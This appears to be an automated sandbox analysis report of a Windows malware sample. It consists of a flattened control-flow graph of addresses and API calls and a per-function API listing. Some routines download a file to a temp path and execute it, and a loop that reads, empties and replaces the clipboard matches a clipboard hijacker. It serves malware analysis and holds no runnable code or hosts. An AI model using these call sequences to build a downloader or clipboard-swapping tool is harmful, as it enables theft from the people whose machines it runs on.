65012->65003 65013->64997 65014->64999 65017 43c9fd ___DestructExceptionObject 65015->65017 65016 43ca0b 65033 42eac9 20 API calls __Wcrtomb 65016->65033 65017->65016 65019 43ca44 65017->65019 65026 43cfcb 65019->65026 65020 43ca10 65034 42a59d 26 API calls _Deallocate 65020->65034 65025 43ca1a __wsopen_s 65025->65009 65036 43f941 65026->65036 65029 43ca68 65035 43ca91 LeaveCriticalSection __wsopen_s 65029->65035 65033->65020 65034->65025 65035->65025 65037 43f964 65036->65037 65038 43f94d 65036->65038 65040 43f983 65037->65040 65041 43f96c 65037->65041 65113 42eac9 20 API calls __Wcrtomb 65038->65113 65117 434faa 10 API calls 2 library calls 65040->65117 65115 42eac9 20 API calls __Wcrtomb 65041->65115 65044 43f952 65114 42a59d 26 API calls _Deallocate 65044->65114 65045 43f971 65116 42a59d 26 API calls _Deallocate 65045->65116 65046 43f98a MultiByteToWideChar 65049 43f9b9 65046->65049 65050 43f9a9 GetLastError 65046->65050 65119 4336a7 21 API calls 3 library calls 65049->65119 65118 42ea93 20 API calls 2 library calls 65050->65118 65053 43cfe1 65053->65029 65060 43d03c 65053->65060 65054 43f9c1 65055 43f9e9 65054->65055 65056 43f9c8 MultiByteToWideChar 65054->65056 65057 43346a _free 20 API calls 65055->65057 65056->65055 65058 43f9dd GetLastError 65056->65058 65057->65053 65120 42ea93 20 API calls 2 library calls 65058->65120 65121 43cd9f 65060->65121 65063 43d087 65139 43977e 65063->65139 65064 43d06e 65153 42eab6 20 API calls __Wcrtomb 65064->65153 65067 43d08c 65069 43d095 65067->65069 65070 43d0ac 65067->65070 65068 43d073 65154 42eac9 20 API calls __Wcrtomb 65068->65154 65155 42eab6 20 API calls __Wcrtomb 65069->65155 65152 43cd0a CreateFileW 65070->65152 65074 43d09a 65156 42eac9 20 API calls __Wcrtomb 65074->65156 65076 43d162 GetFileType 65077 43d1b4 65076->65077 65078 43d16d GetLastError 65076->65078 65161 4396c7 21 API calls 3 library calls 65077->65161 65159 42ea93 20 API calls 2 library calls 65078->65159 65079 43d137 GetLastError 65158 42ea93 20 API calls 2 library calls 65079->65158 65081 43d0e5 65081->65076 65081->65079 65157 43cd0a CreateFileW 65081->65157 65083 43d17b CloseHandle 65083->65068 65085 43d1a4 65083->65085 65160 42eac9 20 API calls __Wcrtomb 65085->65160 65087 43d12a 65087->65076 65087->65079 65089 43d1d5 65091 43d221 65089->65091 65162 43cf1b 169 API calls 4 library calls 65089->65162 65090 43d1a9 65090->65068 65095 43d24e 65091->65095 65163 43cabd 167 API calls 4 library calls 65091->65163 65094 43d247 65094->65095 65096 43d25f 65094->65096 65164 4335cd 29 API calls 2 library calls 65095->65164 65098 43d009 65096->65098 65099 43d2dd CloseHandle 65096->65099 65107 43346a 65098->65107 65165 43cd0a CreateFileW 65099->65165 65101 43d308 65102 43d312 GetLastError 65101->65102 65103 43d257 65101->65103 65166 42ea93 20 API calls 2 library calls 65102->65166 65103->65098 65105 43d31e 65167 439890 21 API calls 3 library calls 65105->65167 65108 43349e __dosmaperr 65107->65108 65109 433475 HeapFree 65107->65109 65108->65029 65109->65108 65110 43348a 65109->65110 65190 42eac9 20 API calls __Wcrtomb 65110->65190 65112 433490 GetLastError 65112->65108 65113->65044 65114->65053 65115->65045 65116->65053 65117->65046 65118->65053 65119->65054 65120->65055 65122 43cdc0 65121->65122 65123 43cdda 65121->65123 65122->65123 65175 42eac9 20 API calls __Wcrtomb 65122->65175 65168 43cd2f 65123->65168 65126 43cdcf 65176 42a59d 26 API calls _Deallocate 65126->65176 65128 43ce12 65129 43ce41 65128->65129 65177 42eac9 20 API calls __Wcrtomb 65128->65177 65136 43ce94 65129->65136 65179 42ffdf 26 API calls 2 library calls 65129->65179 65132 43ce8f 65134 43cf0e 65132->65134 65132->65136 65133 43ce36 65178 42a59d 26 API calls _Deallocate 65133->65178 65180 42a5ca 11 API calls _Atexit 65134->65180 65136->65063 65136->65064 65138 43cf1a 65140 43978a ___DestructExceptionObject 65139->65140 65183 42e3ed EnterCriticalSection 65140->65183 65142 4397d8 65184 439887 65142->65184 65143 4397b6 65187 43955d 21 API calls 3 library calls 65143->65187 65144 439791 65144->65142 65144->65143 65149 439824 EnterCriticalSection 65144->65149 65146 439801 __wsopen_s 65146->65067 65148 4397bb 65148->65142 65188 4396a4 EnterCriticalSection 65148->65188 65149->65142 65150 439831 LeaveCriticalSection 65149->65150 65150->65144 65152->65081 65153->65068 65154->65098 65155->65074 65156->65068 65157->65087 65158->65068 65159->65083 65160->65090 65161->65089 65162->65091 65163->65094 65164->65103 65165->65101 65166->65105 65167->65103 65169 43cd47 65168->65169 65171 43cd62 65169->65171 65181 42eac9 20 API calls __Wcrtomb 65169->65181 65171->65128 65172 43cd86 65182 42a59d 26 API calls _Deallocate 65172->65182 65174 43cd91 65174->65128 65175->65126 65176->65123 65177->65133 65178->65129 65179->65132 65180->65138 65181->65172 65182->65174 65183->65144 65189 42e435 LeaveCriticalSection 65184->65189 65186 43988e 65186->65146 65187->65148 65188->65142 65189->65186 65190->65112 65191 43410a 65192 434116 ___DestructExceptionObject 65191->65192 65193 434122 65192->65193 65194 434139 65192->65194 65225 42eac9 20 API calls __Wcrtomb 65193->65225 65204 42caff EnterCriticalSection 65194->65204 65197 434127 65226 42a59d 26 API calls _Deallocate 65197->65226 65198 434149 65205 434186 65198->65205 65201 434155 65227 43417c LeaveCriticalSection __fread_nolock 65201->65227 65203 434132 __wsopen_s 65204->65198 65206 434194 65205->65206 65207 4341ae 65205->65207 65238 42eac9 20 API calls __Wcrtomb 65206->65238 65228 432908 65207->65228 65210 4341b7 65235 4347d3 65210->65235 65211 434199 65239 42a59d 26 API calls _Deallocate 65211->65239 65215 4342bb 65217 4342c8 65215->65217 65218 43426e 65215->65218 65216 43423f 65216->65218 65220 43425c 65216->65220 65241 42eac9 20 API calls __Wcrtomb 65217->65241 65224 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65218->65224 65242 43431b 30 API calls 2 library calls 65218->65242 65240 43449f 31 API calls 4 library calls 65220->65240 65222 434266 65222->65224 65224->65201 65225->65197 65226->65203 65227->65203 65229 432914 65228->65229 65230 432929 65228->65230 65243 42eac9 20 API calls __Wcrtomb 65229->65243 65230->65210 65232 432919 65244 42a59d 26 API calls _Deallocate 65232->65244 65234 432924 65234->65210 65245 434650 65235->65245 65237 4341d3 65237->65215 65237->65216 65237->65224 65238->65211 65239->65224 65240->65222 65241->65224 65242->65224 65243->65232 65244->65234 65246 43465c ___DestructExceptionObject 65245->65246 65247 434664 65246->65247 65248 43467c 65246->65248 65280 42eab6 20 API calls __Wcrtomb 65247->65280 65250 434730 65248->65250 65255 4346b4 65248->65255 65285 42eab6 20 API calls __Wcrtomb 65250->65285 65251 434669 65281 42eac9 20 API calls __Wcrtomb 65251->65281 65254 434735 65286 42eac9 20 API calls __Wcrtomb 65254->65286 65270 4396a4 EnterCriticalSection 65255->65270 65258 43473d 65287 42a59d 26 API calls _Deallocate 65258->65287 65259 4346ba 65261 4346f3 65259->65261 65262 4346de 65259->65262 65271 434755 65261->65271 65282 42eac9 20 API calls __Wcrtomb 65262->65282 65265 4346e3 65283 42eab6 20 API calls __Wcrtomb 65265->65283 65266 434671 __wsopen_s 65266->65237 65267 4346ee 65284 434728 LeaveCriticalSection __wsopen_s 65267->65284 65270->65259 65288 439921 65271->65288 65273 434767 65274 434780 SetFilePointerEx 65273->65274 65275 43476f 65273->65275 65277 434798 GetLastError 65274->65277 65279 434774 65274->65279 65301 42eac9 20 API calls __Wcrtomb 65275->65301 65302 42ea93 20 API calls 2 library calls 65277->65302 65279->65267 65280->65251 65281->65266 65282->65265 65283->65267 65284->65266 65285->65254 65286->65258 65287->65266 65289 439943 65288->65289 65290 43992e 65288->65290 65295 439968 65289->65295 65305 42eab6 20 API calls __Wcrtomb 65289->65305 65303 42eab6 20 API calls __Wcrtomb 65290->65303 65292 439933 65304 42eac9 20 API calls __Wcrtomb 65292->65304 65295->65273 65296 439973 65306 42eac9 20 API calls __Wcrtomb 65296->65306 65297 43993b 65297->65273 65299 43997b 65307 42a59d 26 API calls _Deallocate 65299->65307 65301->65279 65302->65279 65303->65292 65304->65297 65305->65296 65306->65299 65307->65297 65308 9d9cb6 65309 9d9cc5 65308->65309 65312 9da456 65309->65312 65313 9da471 65312->65313 65314 9da47a CreateToolhelp32Snapshot 65313->65314 65315 9da496 Module32First 65313->65315 65314->65313 65314->65315 65316 9da4a5 65315->65316 65318 9d9cce 65315->65318 65319 9da115 65316->65319 65320 9da140 65319->65320 65321 9da189 65320->65321 65322 9da151 VirtualAlloc 65320->65322 65321->65321 65322->65321 65323 4332de 65324 4332eb 65323->65324 65328 433303 65323->65328 65373 42eac9 20 API calls __Wcrtomb 65324->65373 65326 4332f0 65374 42a59d 26 API calls _Deallocate 65326->65374 65329 43335e 65328->65329 65337 4332fb 65328->65337 65375 434ccd 21 API calls 2 library calls 65328->65375 65331 432908 __fread_nolock 26 API calls 65329->65331 65332 433376 65331->65332 65343 432e16 65332->65343 65334 43337d 65335 432908 __fread_nolock 26 API calls 65334->65335 65334->65337 65336 4333a9 65335->65336 65336->65337 65338 432908 __fread_nolock 26 API calls 65336->65338 65339 4333b7 65338->65339 65339->65337 65340 432908 __fread_nolock 26 API calls 65339->65340 65341 4333c7 65340->65341 65342 432908 __fread_nolock 26 API calls 65341->65342 65342->65337 65344 432e22 ___DestructExceptionObject 65343->65344 65345 432e42 65344->65345 65346 432e2a 65344->65346 65347 432f08 65345->65347 65351 432e7b 65345->65351 65442 42eab6 20 API calls __Wcrtomb 65346->65442 65449 42eab6 20 API calls __Wcrtomb 65347->65449 65350 432e2f 65443 42eac9 20 API calls __Wcrtomb 65350->65443 65354 432e8a 65351->65354 65355 432e9f 65351->65355 65352 432f0d 65450 42eac9 20 API calls __Wcrtomb 65352->65450 65444 42eab6 20 API calls __Wcrtomb 65354->65444 65376 4396a4 EnterCriticalSection 65355->65376 65359 432e97 65451 42a59d 26 API calls _Deallocate 65359->65451 65360 432e8f 65445 42eac9 20 API calls __Wcrtomb 65360->65445 65361 432ea5 65363 432ec1 65361->65363 65364 432ed6 65361->65364 65446 42eac9 20 API calls __Wcrtomb 65363->65446 65377 432f29 65364->65377 65366 432e37 __wsopen_s 65366->65334 65369 432ed1 65448 432f00 LeaveCriticalSection __wsopen_s 65369->65448 65370 432ec6 65447 42eab6 20 API calls __Wcrtomb 65370->65447 65373->65326 65374->65337 65375->65329 65376->65361 65378 432f3b 65377->65378 65383 432f53 65377->65383 65461 42eab6 20 API calls __Wcrtomb 65378->65461 65380 4332bd 65479 42eab6 20 API calls __Wcrtomb 65380->65479 65381 432f40 65462 42eac9 20 API calls __Wcrtomb 65381->65462 65383->65380 65386 432f98 65383->65386 65385 4332c2 65480 42eac9 20 API calls __Wcrtomb 65385->65480 65388 432fa3 65386->65388 65391 432f48 65386->65391 65393 432fd3 65386->65393 65463 42eab6 20 API calls __Wcrtomb 65388->65463 65389 432fb0 65481 42a59d 26 API calls _Deallocate 65389->65481 65391->65369 65392 432fa8 65464 42eac9 20 API calls __Wcrtomb 65392->65464 65396 432fec 65393->65396 65397 433012 65393->65397 65398 43302e 65393->65398 65396->65397 65405 432ff9 65396->65405 65465 42eab6 20 API calls __Wcrtomb 65397->65465 65468 4336a7 21 API calls 3 library calls 65398->65468 65400 433017 65466 42eac9 20 API calls __Wcrtomb 65400->65466 65402 433045 65406 43346a _free 20 API calls 65402->65406 65452 43d365 65405->65452 65409 43304e 65406->65409 65407 43301e 65467 42a59d 26 API calls _Deallocate 65407->65467 65408 433197 65411 43320d 65408->65411 65414 4331b0 GetConsoleMode 65408->65414 65412 43346a _free 20 API calls 65409->65412 65413 433211 ReadFile 65411->65413 65415 433055 65412->65415 65416 433285 GetLastError 65413->65416 65417 43322b 65413->65417 65414->65411 65418 4331c1 65414->65418 65419 43307a 65415->65419 65420 43305f 65415->65420 65421 433292 65416->65421 65422 4331e9 65416->65422 65417->65416 65423 433202 65417->65423 65418->65413 65424 4331c7 ReadConsoleW 65418->65424 65471 4347ee 65419->65471 65469 42eac9 20 API calls __Wcrtomb 65420->65469 65477 42eac9 20 API calls __Wcrtomb 65421->65477 65440 433029 __fread_nolock 65422->65440 65474 42ea93 20 API calls 2 library calls 65422->65474 65435 433250 65423->65435 65436 433267 65423->65436 65423->65440 65424->65423 65429 4331e3 GetLastError 65424->65429 65425 43346a _free 20 API calls 65425->65391 65429->65422 65431 433064 65470 42eab6 20 API calls __Wcrtomb 65431->65470 65432 433297 65478 42eab6 20 API calls __Wcrtomb 65432->65478 65475 432c45 31 API calls 3 library calls 65435->65475 65437 43327e 65436->65437 65436->65440 65476 432a85 29 API calls __fread_nolock 65437->65476 65440->65425 65441 433283 65441->65440 65442->65350 65443->65366 65444->65360 65445->65359 65446->65370 65447->65369 65448->65366 65449->65352 65450->65359 65451->65366 65453 43d372 65452->65453 65454 43d37f 65452->65454 65482 42eac9 20 API calls __Wcrtomb 65453->65482 65457 43d38b 65454->65457 65483 42eac9 20 API calls __Wcrtomb 65454->65483 65456 43d377 65456->65408 65457->65408 65459 43d3ac 65484 42a59d 26 API calls _Deallocate 65459->65484 65461->65381 65462->65391 65463->65392 65464->65389 65465->65400 65466->65407 65467->65440 65468->65402 65469->65431 65470->65440 65472 434755 __fread_nolock 28 API calls 65471->65472 65473 434804 65472->65473 65473->65405 65474->65440 65475->65440 65476->65441 65477->65432 65478->65440 65479->65385 65480->65389 65481->65391 65482->65456 65483->65459 65484->65456 65485 402bad RegCreateKeyExW 65486 402bdb RegSetValueExW 65485->65486 65487 402bef 65485->65487 65486->65487 65488 402bf4 RegCloseKey 65487->65488 65489 402bfd 65487->65489 65488->65489 65490 404b8e 65491 404b9a Concurrency::details::ResourceManager::Version 65490->65491 65496 40fb0c 65491->65496 65495 404bba Mailbox Concurrency::details::ResourceManager::Version 65498 40fb11 65496->65498 65499 404ba3 65498->65499 65501 40fb2d Concurrency::details::FreeThreadProxyFactory::Create 65498->65501 65520 42ad7e 65498->65520 65527 42f450 7 API calls 2 library calls 65498->65527 65504 4051d0 65499->65504 65528 42860d RaiseException 65501->65528 65503 4103cc 65505 4051dc Concurrency::details::ResourceManager::Version __Cnd_init 65504->65505 65507 4051f4 __Mtx_init 65505->65507 65539 40ce32 28 API calls std::_Throw_Cpp_error 65505->65539 65508 40521b 65507->65508 65540 40ce32 28 API calls std::_Throw_Cpp_error 65507->65540 65531 4010ea 65508->65531 65517 40526a 65518 40527f Mailbox 65517->65518 65542 401128 30 API calls 2 library calls 65517->65542 65543 401109 65518->65543 65519 4052a4 Concurrency::details::ResourceManager::Version 65519->65495 65525 4336a7 std::_Locinfo::_Locinfo_ctor 65520->65525 65521 4336e5 65530 42eac9 20 API calls __Wcrtomb 65521->65530 65523 4336d0 RtlAllocateHeap 65524 4336e3 65523->65524 65523->65525 65524->65498 65525->65521 65525->65523 65529 42f450 7 API calls 2 library calls 65525->65529 65527->65498 65528->65503 65529->65525 65530->65524 65547 40d313 65531->65547 65534 401103 65536 40cef3 65534->65536 65571 42e114 65536->65571 65539->65507 65540->65508 65541 40ce32 28 API calls std::_Throw_Cpp_error 65541->65517 65542->65517 65544 401115 __Mtx_unlock 65543->65544 65546 401122 65544->65546 65896 40ce32 28 API calls std::_Throw_Cpp_error 65544->65896 65546->65519 65551 40d06d 65547->65551 65550 40ce32 28 API calls std::_Throw_Cpp_error 65550->65534 65552 40d0c3 65551->65552 65553 40d095 GetCurrentThreadId 65551->65553 65555 40d0c7 GetCurrentThreadId 65552->65555 65556 40d0ed 65552->65556 65554 40d0a0 GetCurrentThreadId 65553->65554 65565 40d0bb 65553->65565 65554->65565 65558 40d0d6 65555->65558 65557 40d186 GetCurrentThreadId 65556->65557 65560 40d10d 65556->65560 65557->65558 65559 40d1dd GetCurrentThreadId 65558->65559 65558->65565 65559->65565 65569 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65560->65569 65561 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65564 4010f6 65561->65564 65564->65534 65564->65550 65565->65561 65566 40d145 GetCurrentThreadId 65566->65558 65567 40d118 __Xtime_diff_to_millis2 65566->65567 65567->65558 65567->65565 65567->65566 65570 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65567->65570 65569->65567 65570->65567 65572 42e121 65571->65572 65573 42e135 65571->65573 65594 42eac9 20 API calls __Wcrtomb 65572->65594 65585 42e0cb 65573->65585 65577 42e126 65595 42a59d 26 API calls _Deallocate 65577->65595 65578 42e14a CreateThread 65580 42e169 GetLastError 65578->65580 65584 42e175 65578->65584 65616 42dfc0 65578->65616 65596 42ea93 20 API calls 2 library calls 65580->65596 65581 405257 65581->65517 65581->65541 65597 42e03d 65584->65597 65605 434d2a 65585->65605 65588 43346a _free 20 API calls 65589 42e0e4 65588->65589 65590 42e103 65589->65590 65591 42e0eb GetModuleHandleExW 65589->65591 65592 42e03d __Thrd_start 22 API calls 65590->65592 65591->65590 65593 42e10d 65592->65593 65593->65578 65593->65584 65594->65577 65595->65581 65596->65584 65598 42e04a 65597->65598 65599 42e06e 65597->65599 65600 42e050 CloseHandle 65598->65600 65601 42e059 65598->65601 65599->65581 65600->65601 65602 42e068 65601->65602 65603 42e05f FreeLibrary 65601->65603 65604 43346a _free 20 API calls 65602->65604 65603->65602 65604->65599 65606 434d37 65605->65606 65607 434d77 65606->65607 65608 434d62 HeapAlloc 65606->65608 65613 434d4b std::_Locinfo::_Locinfo_ctor 65606->65613 65615 42eac9 20 API calls __Wcrtomb 65607->65615 65610 434d75 65608->65610 65608->65613 65611 42e0db 65610->65611 65611->65588 65613->65607 65613->65608 65614 42f450 7 API calls 2 library calls 65613->65614 65614->65613 65615->65611 65617 42dfcc _Atexit 65616->65617 65618 42dfd3 GetLastError ExitThread 65617->65618 65619 42dfe0 65617->65619 65632 431eda GetLastError 65619->65632 65621 42dfe5 65652 435571 65621->65652 65624 42dffb 65659 401169 65624->65659 65633 431ef0 65632->65633 65634 431ef6 65632->65634 65667 435111 11 API calls 2 library calls 65633->65667 65635 434d2a std::_Locinfo::_Locinfo_ctor 20 API calls 65634->65635 65638 431f45 SetLastError 65634->65638 65637 431f08 65635->65637 65643 431f10 65637->65643 65668 435167 11 API calls 2 library calls 65637->65668 65638->65621 65640 43346a _free 20 API calls 65642 431f16 65640->65642 65641 431f25 65641->65643 65644 431f2c 65641->65644 65645 431f51 SetLastError 65642->65645 65643->65640 65669 431d4c 20 API calls __Wcrtomb 65644->65669 65670 42df7d 167 API calls 2 library calls 65645->65670 65648 431f37 65650 43346a _free 20 API calls 65648->65650 65649 431f5d 65651 431f3e 65650->65651 65651->65638 65651->65645 65653 435596 65652->65653 65654 43558c 65652->65654 65671 434e93 5 API calls 2 library calls 65653->65671 65656 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65654->65656 65657 42dff0 65656->65657 65657->65624 65666 4354a4 10 API calls 2 library calls 65657->65666 65658 4355ad 65658->65654 65672 405800 65659->65672 65685 40155a Sleep 65659->65685 65660 401173 65663 42e199 65660->65663 65864 42e074 65663->65864 65665 42e1a6 65666->65624 65667->65634 65668->65641 65669->65648 65670->65649 65671->65658 65673 40580c Concurrency::details::ResourceManager::Version 65672->65673 65674 4010ea std::_Cnd_initX 35 API calls 65673->65674 65675 405821 __Cnd_signal 65674->65675 65676 405839 65675->65676 65731 40ce32 28 API calls std::_Throw_Cpp_error 65675->65731 65678 401109 std::_Cnd_initX 28 API calls 65676->65678 65679 405842 65678->65679 65687 4029f4 InternetOpenW 65679->65687 65703 4016df 65679->65703 65682 405849 Mailbox Concurrency::details::ResourceManager::Version 65682->65660 65686 4016d5 65685->65686 65688 402a27 InternetOpenUrlW 65687->65688 65689 402b9c 65687->65689 65688->65689 65690 402a3d GetTempPathW GetTempFileNameW 65688->65690 65692 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65689->65692 65732 42a88e 65690->65732 65694 402bab 65692->65694 65724 40e76b 65694->65724 65695 402b8b InternetCloseHandle InternetCloseHandle 65695->65689 65696 402aa8 Concurrency::details::GlobalNode::Initialize 65697 402ac0 InternetReadFile WriteFile 65696->65697 65698 402b00 CloseHandle 65696->65698 65697->65696 65734 402960 65698->65734 65701 402b2b ShellExecuteExW 65701->65695 65702 402b72 WaitForSingleObject CloseHandle 65701->65702 65702->65695 65842 40fde6 65703->65842 65705 4016eb Sleep 65843 40cc10 65705->65843 65708 40cc10 28 API calls 65709 401711 65708->65709 65710 40171b OpenClipboard 65709->65710 65711 401943 Sleep 65710->65711 65712 40172b GetClipboardData 65710->65712 65711->65710 65713 40173b GlobalLock 65712->65713 65714 40193d CloseClipboard 65712->65714 65713->65714 65719 401748 _strlen 65713->65719 65714->65711 65715 40cbc7 28 API calls std::system_error::system_error 65715->65719 65716 40cc10 28 API calls 65716->65719 65718 4018d2 EmptyClipboard GlobalAlloc 65718->65719 65720 4018eb GlobalLock 65718->65720 65719->65714 65719->65715 65719->65716 65719->65718 65847 402e66 167 API calls 2 library calls 65719->65847 65849 40caa6 26 API calls _Deallocate 65719->65849 65848 426990 65720->65848 65723 401905 GlobalUnlock SetClipboardData GlobalFree 65723->65719 65855 40deea 65724->65855 65729 40e810 65729->65682 65730 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65862 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65730->65862 65731->65676 65733 402a76 CreateFileW 65732->65733 65733->65695 65733->65696 65735 40298b _wcslen Concurrency::details::GlobalNode::Initialize 65734->65735 65744 42b454 65735->65744 65739 4029b8 65766 404333 65739->65766 65742 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65743 4029f2 65742->65743 65743->65695 65743->65701 65770 42b106 65744->65770 65747 402823 65748 402832 Concurrency::details::ResourceManager::Version 65747->65748 65796 4032dd 65748->65796 65750 402846 65812 403b8b 65750->65812 65752 40285a 65753 402888 65752->65753 65754 40286c 65752->65754 65818 403112 65753->65818 65839 40329a 167 API calls 65754->65839 65757 402895 65821 403c20 65757->65821 65759 4028a7 65831 403cc2 65759->65831 65761 4028c4 65763 404333 26 API calls 65761->65763 65762 40287f std::ios_base::_Ios_base_dtor Concurrency::details::ResourceManager::Version 65762->65739 65764 4028e3 65763->65764 65840 40329a 167 API calls 65764->65840 65767 4029e4 65766->65767 65768 40433b 65766->65768 65767->65742 65841 40cc96 26 API calls 2 library calls 65768->65841 65771 42b133 65770->65771 65772 42b142 65771->65772 65773 42b15a 65771->65773 65789 42b137 65771->65789 65774 42eac9 __Wcrtomb 20 API calls 65772->65774 65775 42a747 __fassign 162 API calls 65773->65775 65777 42b147 65774->65777 65778 42b165 65775->65778 65776 40f8cf __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65781 4029a4 65776->65781 65782 42a59d __wsopen_s 26 API calls 65777->65782 65779 42b170 65778->65779 65780 42b307 65778->65780 65785 42b218 WideCharToMultiByte 65779->65785 65791 42b17b 65779->65791 65793 42b1b5 WideCharToMultiByte 65779->65793 65783 42b334 WideCharToMultiByte 65780->65783 65784 42b312 65780->65784 65781->65747 65782->65789 65783->65784 65786 42eac9 __Wcrtomb 20 API calls 65784->65786 65784->65789 65787 42b243 65785->65787 65785->65791 65786->65789 65790 42b24c GetLastError 65787->65790 65787->65791 65789->65776 65790->65791 65794 42b25b 65790->65794 65791->65789 65792 42eac9 __Wcrtomb 20 API calls 65791->65792 65792->65789 65793->65791 65794->65784 65794->65789 65795 42b274 WideCharToMultiByte 65794->65795 65795->65784 65795->65794 65797 4032e9 Concurrency::details::ResourceManager::Version 65796->65797 65798 40467c 167 API calls 65797->65798 65799 403315 65798->65799 65800 40484d 167 API calls 65799->65800 65801 40333e 65800->65801 65802 40458c 26 API calls 65801->65802 65803 40334d 65802->65803 65804 403392 std::ios_base::_Ios_base_dtor 65803->65804 65805 40dde3 167 API calls 65803->65805 65806 4033ce Concurrency::details::ResourceManager::Version 65804->65806 65808 40c618 167 API calls 65804->65808 65807 403362 65805->65807 65806->65750 65807->65804 65809 40458c 26 API calls 65807->65809 65808->65806 65810 403373 65809->65810 65811 404c14 167 API calls 65810->65811 65811->65804 65813 403b97 Concurrency::details::ResourceManager::Version 65812->65813 65814 4042af 167 API calls 65813->65814 65815 403ba3 65814->65815 65816 403bc7 Concurrency::details::ResourceManager::Version 65815->65816 65817 4034fb 167 API calls 65815->65817 65816->65752 65817->65816 65819 404356 28 API calls 65818->65819 65820 40312c Concurrency::details::GlobalNode::Initialize 65819->65820 65820->65757 65822 403c2c Concurrency::details::ResourceManager::Version 65821->65822 65823 40c618 167 API calls 65822->65823 65824 403c4f 65823->65824 65825 4042af 167 API calls 65824->65825 65826 403c59 65825->65826 65828 403c9c Concurrency::details::ResourceManager::Version 65826->65828 65830 4034fb 167 API calls 65826->65830 65827 403c7a 65827->65828 65829 4046ca 167 API calls 65827->65829 65828->65759 65829->65828 65830->65827 65832 403cce __EH_prolog3_catch 65831->65832 65833 4042af 167 API calls 65832->65833 65835 403ce7 65833->65835 65834 4046ca 167 API calls 65837 403d70 Concurrency::details::ResourceManager::Version 65834->65837 65836 403d17 65835->65836 65838 40369f 40 API calls 65835->65838 65836->65834 65837->65761 65838->65836 65839->65762 65840->65762 65841->65767 65842->65705 65844 40cc2c _strlen 65843->65844 65850 40cbc7 65844->65850 65846 401704 65846->65708 65847->65719 65848->65723 65849->65719 65851 40cbfa 65850->65851 65853 40cbd6 BuildCatchObjectHelperInternal 65850->65853 65851->65853 65854 40cb5c 28 API calls 4 library calls 65851->65854 65853->65846 65854->65853 65863 40f22a EnterCriticalSection 65855->65863 65857 40def4 65858 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65857->65858 65859 40ced2 65858->65859 65860 40cec7 CloseHandle 65858->65860 65861 40ced6 GetCurrentThreadId 65859->65861 65860->65861 65861->65730 65862->65729 65863->65857 65873 431f5e GetLastError 65864->65873 65866 42e083 ExitThread 65867 42e0a1 65870 42e0b4 65867->65870 65871 42e0ad CloseHandle 65867->65871 65870->65866 65872 42e0c0 FreeLibraryAndExitThread 65870->65872 65871->65870 65874 431f7d 65873->65874 65875 431f77 65873->65875 65877 434d2a std::_Locinfo::_Locinfo_ctor 17 API calls 65874->65877 65879 431fd4 SetLastError 65874->65879 65893 435111 11 API calls 2 library calls 65875->65893 65878 431f8f 65877->65878 65886 431f97 65878->65886 65894 435167 11 API calls 2 library calls 65878->65894 65880 42e07f 65879->65880 65880->65866 65880->65867 65892 4354f6 10 API calls 2 library calls 65880->65892 65882 43346a _free 17 API calls 65884 431f9d 65882->65884 65883 431fac 65885 431fb3 65883->65885 65883->65886 65888 431fcb SetLastError 65884->65888 65895 431d4c 20 API calls __Wcrtomb 65885->65895 65886->65882 65888->65880 65889 431fbe 65890 43346a _free 17 API calls 65889->65890 65891 431fc4 65890->65891 65891->65879 65891->65888 65892->65867 65893->65874 65894->65883 65895->65889 65896->65546 65897 40239e 65898 402561 PostQuitMessage 65897->65898 65899 4023b2 65897->65899 65903 40255f 65898->65903 65900 4023b9 DefWindowProcW 65899->65900 65901 4023d0 65899->65901 65900->65903 65902 4029f4 167 API calls 65901->65902 65901->65903 65902->65903

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                      • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                        • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                                      • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                      • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                      • _strlen.LIBCMT ref: 00401749
                                                                      • _strlen.LIBCMT ref: 00401778
                                                                      • _strlen.LIBCMT ref: 004018BC
                                                                      • EmptyClipboard.USER32 ref: 004018D2
                                                                      • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                      • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                      • CloseClipboard.USER32 ref: 0040193D
                                                                      • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                      • String ID: i
                                                                      • API String ID: 1583243082-3865851505
                                                                      • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                      • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                      • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                      • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

                                                                      Control-flow Graph

                                                                      APIs
